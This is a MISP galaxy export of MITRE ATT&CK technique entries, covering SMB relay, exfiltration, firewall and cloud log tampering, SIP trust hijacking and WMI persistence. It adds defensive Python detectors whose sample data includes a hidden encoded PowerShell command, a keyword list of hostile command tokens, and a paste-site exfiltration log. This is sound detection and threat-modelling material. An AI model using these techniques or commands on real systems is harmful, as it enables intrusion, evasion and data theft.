Unauthorized user introduces compromise delivery mechanism - T1387

This technique has been deprecated. Please use Hardware Additions where appropriate.

If an adversary can gain physical access to the target's environment they can introduce a variety of devices that provide compromise mechanisms. This could include installing keyboard loggers, adding routing/wireless equipment, or connecting computing devices. (Citation: Credit Card Skimmers)

Internal MISP references

UUID b3253d9e-ba11-430f-b5a3-4db844ce5413 which can be used as unique global reference for Unauthorized user introduces compromise delivery mechanism - T1387 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1387
kill_chain ['pre-attack:compromise']

Deliver Malicious App via Other Means - T1476

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to the increased potential risk of detection or other reasons. However, mobile devices are often configured to allow application installation only from an authorized app store, which would prevent this technique from working.

Delivery methods for the malicious application include:

  • Spearphishing Attachment - Including the mobile app package as an attachment to an email message.
  • Spearphishing Link - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), website, QR code, or other means.
  • Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)

Some Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)

Internal MISP references

UUID 53263a67-075e-48fa-974b-91c5b5445db7 which can be used as unique global reference for Deliver Malicious App via Other Means - T1476 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1476
kill_chain ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access']
mitre_platforms ['Android', 'iOS']

Upload, install, and configure software/tools - T1362

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)

Internal MISP references

UUID e8471f43-2742-4fd7-9af7-8ed1330ada37 which can be used as unique global reference for Upload, install, and configure software/tools - T1362 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1362
kill_chain ['pre-attack:stage-capabilities']

LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001

By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary-controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary-controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords.

In some cases where an adversary has access to a system that is in the authentication path between systems, or when automated scans that use credentials attempt to authenticate to an adversary-controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.

Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)

Internal MISP references

UUID 650c784b-7504-4df7-ab2c-4ea882384d1e which can be used as unique global reference for LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1557.001
kill_chain ['attack-Windows:credential-access', 'attack-Windows:collection']
mitre_data_sources ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows']

Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003

Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

Internal MISP references

UUID fb8d023d-45be-47e9-bc51-f56bcae6435b which can be used as unique global reference for Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1048.003
kill_chain ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration', 'attack-Network:exfiltration']
mitre_data_sources ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows', 'Network']

Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001

Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.

Internal MISP references

UUID 37047267-3e56-453c-833e-d92b68118120 which can be used as unique global reference for Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1639.001
kill_chain ['mobile-attack-Android:exfiltration', 'mobile-attack-iOS:exfiltration']
mitre_platforms ['Android', 'iOS']

Match Legitimate Name or Location - T1036.005

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.

Internal MISP references

UUID 1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2 which can be used as unique global reference for Match Legitimate Name or Location - T1036.005 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1036.005
kill_chain ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Containers:defense-evasion']
mitre_data_sources ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Creation', 'Process: Process Metadata']
mitre_platforms ['Linux', 'macOS', 'Windows', 'Containers']

Match Legitimate Name or Location - T1655.001

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by giving artifacts the name and icon of a legitimate, trusted application (i.e., Settings), or using a package name that matches legitimate, trusted applications (i.e., com.google.android.gm).

Adversaries may also use the same icon of the file or application they are trying to mimic.

Internal MISP references

UUID 114fed8b-7eed-4136-8b9c-411c5c7fff4b which can be used as unique global reference for Match Legitimate Name or Location - T1655.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1655.001
kill_chain ['mobile-attack-Android:defense-evasion', 'mobile-attack-iOS:defense-evasion']
mitre_platforms ['Android', 'iOS']

Disable or Modify System Firewall - T1562.004

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.

Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less scrutinized port (i.e. Non-Standard Port).(Citation: change_rdp_port_conti)

Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various Remote Services may also indirectly modify firewall rules.

Internal MISP references

UUID 5372c5fe-f424-4def-bcd5-d3a8e770f07b which can be used as unique global reference for Disable or Modify System Firewall - T1562.004 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1562.004
kill_chain ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Network:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'Firewall: Firewall Disable', 'Firewall: Firewall Rule Modification', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Linux', 'macOS', 'Windows', 'Network']

Disable or Modify Cloud Firewall - T1562.007

Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in Disable or Modify System Firewall.

Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)

Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

Internal MISP references

UUID 77532a55-c283-4cd2-bc5d-2d0b65e9d88c which can be used as unique global reference for Disable or Modify Cloud Firewall - T1562.007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1562.007
kill_chain ['attack-IaaS:defense-evasion']
mitre_data_sources ['Firewall: Firewall Disable', 'Firewall: Firewall Rule Modification']
mitre_platforms ['IaaS']

Disable or Modify Cloud Logs - T1562.008

An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.

For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
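
Both this technique and Disable or Modify Cloud Firewall (T1562.007) above leave their trace in the same place, the CloudTrail management events, so one detector serves both. The following is an added example, not part of the ATT&CK text or any vendor tool: it walks CloudTrail-shaped records, flags AuthorizeSecurityGroupIngress calls whose CIDR is the whole Internet (0.0.0.0/0 or ::/0), and flags StopLogging, DeleteTrail, PutEventSelectors, and UpdateTrail calls that switch off multi-region logging, log-file validation, the SNS topic, or the KMS key, which are the tampering steps named in the paragraph above. The records are constructed; their request-parameter layout follows what CloudTrail emits for these calls (lists wrapped in "items"), but the account, ARNs, and values are invented for the example.

```python
import ipaddress


def _event(name, source, params, actor="arn:aws:iam::111122223333:user/dev"):
    """Build a minimal CloudTrail-shaped record (constructed sample data)."""
    return {"eventSource": source, "eventName": name,
            "userIdentity": {"arn": actor}, "requestParameters": params}


# Constructed records; none of this is captured telemetry.
SAMPLE_EVENTS = [
    _event("AuthorizeSecurityGroupIngress", "ec2.amazonaws.com", {
        "groupId": "sg-0a1b2c3d", "ipPermissions": {"items": [
            {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
             "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}),
    _event("AuthorizeSecurityGroupIngress", "ec2.amazonaws.com", {
        "groupId": "sg-0a1b2c3d", "ipPermissions": {"items": [
            {"ipProtocol": "tcp", "fromPort": 443, "toPort": 443,
             "ipRanges": {"items": [{"cidrIp": "10.0.0.0/8"}]}}]}}),
    _event("AuthorizeSecurityGroupIngress", "ec2.amazonaws.com", {
        "groupId": "sg-0a1b2c3d", "ipPermissions": {"items": [
            {"ipProtocol": "-1",
             "ipv6Ranges": {"items": [{"cidrIpv6": "::/0"}]}}]}}),
    _event("StopLogging", "cloudtrail.amazonaws.com", {"name": "org-trail"}),
    _event("UpdateTrail", "cloudtrail.amazonaws.com", {
        "name": "org-trail", "isMultiRegionTrail": False,
        "enableLogFileValidation": False}),
    _event("DescribeTrails", "cloudtrail.amazonaws.com", None),
]

# Calls that stop or remove a trail outright versus ones that narrow what it
# records; both deserve an alert, the first set a louder one.
TRAIL_KILL = {"StopLogging", "DeleteTrail"}
TRAIL_NARROW = {"PutEventSelectors", "UpdateTrail"}
WEAKENING_FIELDS = ("isMultiRegionTrail", "enableLogFileValidation")


def world_open(cidr):
    """True for 0.0.0.0/0 and ::/0 (any network with prefix length zero)."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0


def check_security_group(rec):
    """T1562.007: ingress rules that open a group to the whole Internet."""
    out = []
    for perm in rec["requestParameters"]["ipPermissions"]["items"]:
        cidrs = [r["cidrIp"] for r in perm.get("ipRanges", {}).get("items", [])]
        cidrs += [r["cidrIpv6"] for r in perm.get("ipv6Ranges", {}).get("items", [])]
        for cidr in cidrs:
            if world_open(cidr):
                proto = perm.get("ipProtocol")
                ports = "all" if proto == "-1" else f"{perm.get('fromPort')}-{perm.get('toPort')}"
                out.append(f"sg_world_open:{rec['requestParameters']['groupId']}:{proto}:{ports}")
    return out


def check_trail(rec):
    """T1562.008: trail stopped, deleted, or weakened."""
    name = rec["eventName"]
    params = rec.get("requestParameters") or {}
    if name in TRAIL_KILL:
        return [f"trail_stopped:{name}:{params.get('name')}"]
    if name in TRAIL_NARROW:
        weak = [f for f in WEAKENING_FIELDS if params.get(f) is False]
        weak += [f for f in ("snsTopicName", "kmsKeyId") if f in params and not params[f]]
        if name == "PutEventSelectors" or weak:
            return [f"trail_weakened:{name}:{','.join(weak) or 'selectors'}"]
    return []


def analyze(events):
    """Return (actor ARN, finding) pairs for every record that matches."""
    findings = []
    for rec in events:
        if rec["eventName"] == "AuthorizeSecurityGroupIngress":
            hits = check_security_group(rec)
        elif rec["eventSource"] == "cloudtrail.amazonaws.com":
            hits = check_trail(rec)
        else:
            hits = []
        findings += [(rec["userIdentity"]["arn"], h) for h in hits]
    return findings


if __name__ == "__main__":
    for actor, finding in analyze(SAMPLE_EVENTS):
        print(actor, finding)
```

One caveat a practitioner should keep in mind: a StopLogging or DeleteTrail call is itself recorded by the trail it targets only up to the moment it takes effect, so the signal for this technique must be shipped to a second destination (another trail, an organization trail, or an EventBridge rule) that the same principal cannot switch off.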

Internal MISP references

UUID cacc40da-4c9e-462c-80d5-fd70a178b12d which can be used as unique global reference for Disable or Modify Cloud Logs - T1562.008 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1562.008
kill_chain ['attack-IaaS:defense-evasion', 'attack-SaaS:defense-evasion', 'attack-Google-Workspace:defense-evasion', 'attack-Azure-AD:defense-evasion', 'attack-Office-365:defense-evasion']
mitre_data_sources ['Cloud Service: Cloud Service Disable', 'Cloud Service: Cloud Service Modification', 'User Account: User Account Modification']
mitre_platforms ['IaaS', 'SaaS', 'Google Workspace', 'Azure AD', 'Office 365']

SIP and Trust Provider Hijacking - T1553.003

Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, attributes that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)

  • Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
  • Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
  • Modifying the $DLL and $Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking a SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
  • Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)

Internal MISP references

UUID 543fceb5-cb92-40cb-aacf-6913d4db58bc which can be used as unique global reference for SIP and Trust Provider Hijacking - T1553.003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1553.003
kill_chain ['attack-Windows:defense-evasion']
mitre_data_sources ['File: File Modification', 'Module: Module Load', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows']

Windows Management Instrumentation Event Subscription - T1546.003

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also define the filter, consumer, and binding in a Managed Object Format (MOF) file (.mof extension) and compile it into the WMI repository with mofcomp.exe to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
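
A subscription only becomes a persistence mechanism once a __FilterToConsumerBinding joins an __EventFilter to a consumer, so detection should correlate the three objects rather than alert on any one of them. The following is an added example, not part of the ATT&CK text: it joins records modelled on Sysmon event IDs 19 (filter), 20 (consumer), and 21 (binding) by object name and reports the chains that use a code-executing consumer class, a suspicious consumer command line, or a trigger on the uptime, clock, or logon events the paragraph above names. The records are constructed, the field names follow Sysmon's WMI events but are an assumption for this example, and the second chain mimics the built-in SCM Event Log subscription present on Windows hosts so the example shows what a benign chain looks like.

```python
import re

# Constructed records modelled on Sysmon event IDs 19 (WmiFilterEvent),
# 20 (WmiConsumerEvent) and 21 (WmiBindingEvent). Field names and values are
# assumptions for this example, not captured telemetry.
EVENTS = [
    {"EventID": 19, "User": "CORP\\svc-deploy", "Name": "BotFilter82",
     "EventNamespace": "root\\subscription",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE "
              "TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' "
              "AND TargetInstance.SystemUpTime >= 240"},
    {"EventID": 20, "User": "CORP\\svc-deploy", "Name": "BotConsumer23",
     "Type": "Command Line",
     "Destination": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"EventID": 21, "User": "CORP\\svc-deploy",
     "Consumer": 'CommandLineEventConsumer.Name="BotConsumer23"',
     "Filter": '__EventFilter.Name="BotFilter82"'},
    {"EventID": 19, "User": "NT AUTHORITY\\SYSTEM", "Name": "SCM Event Log Filter",
     "EventNamespace": "root\\subscription",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "User": "NT AUTHORITY\\SYSTEM", "Name": "SCM Event Log Consumer",
     "Type": "NT Event Log", "Destination": ""},
    {"EventID": 21, "User": "NT AUTHORITY\\SYSTEM",
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
]

# Consumer classes that run code, and the event sources the ATT&CK text names
# as typical triggers (uptime, wall-clock time, logon), plus process starts.
ACTIVE_CONSUMER_TYPES = {"Command Line", "Active Script"}
TRIGGER_CLASSES = ("Win32_PerfFormattedData_PerfOS_System", "Win32_LocalTime",
                   "Win32_LogonSession", "Win32_ProcessStartTrace", "Win32_Process")
COMMAND_INDICATORS = ("-enc", "-encodedcommand", "hidden", "downloadstring",
                      "iex", "mshta", "regsvr32", "rundll32", "wscript", "cscript")
NAME_RE = re.compile(r'Name="([^"]+)"')


def correlate(events):
    """Join bindings (21) to their filter (19) and consumer (20) by name and
    attach the reasons each chain looks like T1546.003 abuse."""
    filters = {e["Name"]: e for e in events if e["EventID"] == 19}
    consumers = {e["Name"]: e for e in events if e["EventID"] == 20}
    chains = []
    for b in (e for e in events if e["EventID"] == 21):
        f_name = NAME_RE.search(b["Filter"]).group(1)
        c_name = NAME_RE.search(b["Consumer"]).group(1)
        flt, con = filters.get(f_name, {}), consumers.get(c_name, {})
        reasons = []
        if con.get("Type") in ACTIVE_CONSUMER_TYPES:
            reasons.append(f"code-executing consumer ({con['Type']})")
        dest = con.get("Destination", "").lower()
        if any(tok in dest for tok in COMMAND_INDICATORS):
            reasons.append("suspicious consumer command line")
        query = flt.get("Query", "")
        if any(cls.lower() in query.lower() for cls in TRIGGER_CLASSES):
            reasons.append("trigger on uptime/time/logon/process event")
        if not flt or not con:
            reasons.append("binding references a missing filter or consumer")
        chains.append({"user": b["User"], "filter": f_name, "consumer": c_name,
                       "query": query, "command": con.get("Destination", ""),
                       "reasons": reasons})
    return chains


def suspicious(events):
    """Chains with at least one reason; the SCM chain has none."""
    return [c for c in correlate(events) if c["reasons"]]


if __name__ == "__main__":
    for chain in suspicious(EVENTS):
        print(chain["user"], chain["filter"], "->", chain["consumer"])
        for r in chain["reasons"]:
            print("   ", r)
```

On a live host the same three object classes can be listed from the root\subscription namespace to hunt for subscriptions that were created before logging was switched on; the correlation logic is the same, only the record source changes.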

Internal MISP references

UUID 910906dd-8c0a-475a-9cc1-5e029e2fad58 which can be used as unique global reference for Windows Management Instrumentation Event Subscription - T1546.003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1546.003
kill_chain ['attack-Windows:privilege-escalation', 'attack-Windows:persistence']
mitre_data_sources ['Command: Command Execution', 'File: File Creation', 'Process: Process Creation', 'WMI: WMI Creation']
mitre_platforms ['Windows']

Exfiltration to Text Storage Sites - T1567.003

Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information.

Text storage sites are often used to host malicious code for C2 communication (e.g., Stage Capabilities), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)

Note: This is distinct from Exfiltration to Code Repository, which highlights access to code repositories via APIs.
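
The two data sources listed for this technique, network traffic content and flow, are what a web proxy records, so a practical check is to separate uploads to text storage sites (this technique) from downloads of content hosted there (staging, per the paragraph above) and to aggregate upload volume per client. The following is an added example, not part of the ATT&CK text: it parses constructed proxy log lines, keeps only requests to a small allowlist of text storage domains, and alerts when one client's uploads to one such host exceed a byte or count threshold. The log layout, the domain list, the thresholds, and every line of traffic are assumptions for this example.

```python
from collections import defaultdict

# Constructed proxy log lines, one request per line:
# "<utc time> <client> <method> <host> <path> <status> <bytes sent by client>".
# Not real traffic; the field layout is an assumption for this example.
SAMPLE_LOG = """\
2024-05-01T09:00:01Z 10.1.2.3 GET  pastebin.com /raw/Ab12Cd34 200 210
2024-05-01T09:00:05Z 10.1.2.3 POST pastebin.com /api/api_post.php 200 48211
2024-05-01T09:00:09Z 10.1.2.3 POST pastebin.com /api/api_post.php 200 51230
2024-05-01T09:00:14Z 10.1.2.3 POST pastebin.com /api/api_post.php 200 49877
2024-05-01T09:03:00Z 10.1.2.9 POST paste.ee /api/v1/pastes 201 1730
2024-05-01T09:04:00Z 10.1.2.9 POST github.com /login 302 420
2024-05-01T09:05:00Z 10.1.2.7 GET  example.com / 200 0
"""

# Services of the "text storage site" kind; a starting list assumed for
# this example, not a complete one.
TEXT_STORAGE = {"pastebin.com", "paste.ee", "hastebin.com", "ghostbin.co",
                "privatebin.net", "justpaste.it"}
UPLOAD_METHODS = {"POST", "PUT"}
BYTES_THRESHOLD = 100_000    # client-sent bytes per (client, host) before alerting
COUNT_THRESHOLD = 3          # or this many uploads


def parse(log_text):
    """Split each line into a record; bytes and status become integers."""
    rows = []
    for line in log_text.splitlines():
        ts, client, method, host, path, status, sent = line.split()
        rows.append({"ts": ts, "client": client, "method": method,
                     "host": host.lower(), "path": path,
                     "status": int(status), "sent": int(sent)})
    return rows


def find_uploads(rows):
    """Uploads to text storage sites; fetches (GET) are a separate signal
    (staging/C2) and are returned on their own."""
    uploads, fetches = [], []
    for r in rows:
        if r["host"] not in TEXT_STORAGE:
            continue
        (uploads if r["method"] in UPLOAD_METHODS else fetches).append(r)
    return uploads, fetches


def aggregate(uploads):
    """Sum bytes and count per (client, host) and keep the pairs over threshold."""
    totals = defaultdict(lambda: {"count": 0, "bytes": 0})
    for r in uploads:
        t = totals[(r["client"], r["host"])]
        t["count"] += 1
        t["bytes"] += r["sent"]
    return {k: v for k, v in totals.items()
            if v["bytes"] >= BYTES_THRESHOLD or v["count"] >= COUNT_THRESHOLD}


if __name__ == "__main__":
    uploads, fetches = find_uploads(parse(SAMPLE_LOG))
    for (client, host), t in aggregate(uploads).items():
        print(f"{client} -> {host}: {t['count']} uploads, {t['bytes']} bytes")
    for r in fetches:
        print("fetch from text storage:", r["client"], r["host"] + r["path"])
```

With TLS in the path the proxy sees the host (from the CONNECT request or SNI) and the byte counts but not the method or path, so without TLS inspection the method split collapses and the per-host byte aggregation is the signal that remains.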

Internal MISP references

UUID ba04e672-da86-4e69-aa15-0eca5db25f43 which can be used as unique global reference for Exfiltration to Text Storage Sites - T1567.003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1567.003
kill_chain ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration']
mitre_data_sources ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
mitre_platforms ['Linux', 'macOS', 'Windows']

Executable Installer File Permissions Weakness - T1574.005

Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of DLL Search Order Hijacking.

